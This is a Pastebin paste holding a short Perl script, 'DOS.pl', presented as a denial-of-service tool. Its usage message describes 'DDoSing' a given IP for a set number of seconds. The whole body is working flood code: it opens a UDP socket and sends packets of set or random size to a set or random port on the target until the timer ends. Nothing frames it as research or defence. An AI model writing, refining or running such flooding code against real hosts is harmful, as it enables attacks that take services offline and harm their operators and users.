Advertisement
Guest User

Untitled

a guest
Jan 24th, 2017
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.78 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #Created by ./Tatu
  4. #Port - Use '80' Para Pessoas ou Porta 53 Para DNS Ou 8090 Para Site
  5. #Size - Use '100 - 2000' (Reccomended).
  6.  
  7. use Socket;
  8. use strict;
  9.  
  10. print '
  11.  
  12.  
  13. ________ ______ _______ ______
  14. | | |\ | | \ / | | | | | | \
  15. | | | \ | | \ / | | | | | | \
  16. | | | \ | | \ / |_______| |______ |_______| | |
  17. | | | \ | | | | | | | | | |
  18. | | | \ | | | | | | | | | /
  19. |________| | \| |_______ | | | |______ | | |______/
  20. ';
  21. print "\n";
  22.  
  23.  
  24. if ($#ARGV != 3) {
  25. print "\n\t\t\t***Error command must recieve four arguements***\n";
  26. print "-Ex) perl DOS.pl 1.1.1.1 80 1000 300\n";
  27. print "-Therefore DDoSing the IP '1.1.1.1' for '300' seconds on port '80' using '1000' packets\n\n";
  28. exit(1);
  29. }
  30.  
  31. my ($ip,$port,$size,$time) = @ARGV;
  32. my ($iaddr,$endtime,$psize,$pport);
  33. $iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
  34. $endtime = time() + ($time ? $time : 1000000);
  35. socket(flood, PF_INET, SOCK_DGRAM, 17);
  36. print "~To cancel the attack press \'Ctrl-C\'\n\n";
  37. print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
  38. print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
  39. print "To cancel the attack press 'Ctrl-C'\n" unless $time;
  40. for (;time() <= $endtime;) {
  41. $psize = $size ? $size : int(rand(1500-64)+64) ;
  42. $pport = $port ? $port : int(rand(65500))+1;
  43.  
  44. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement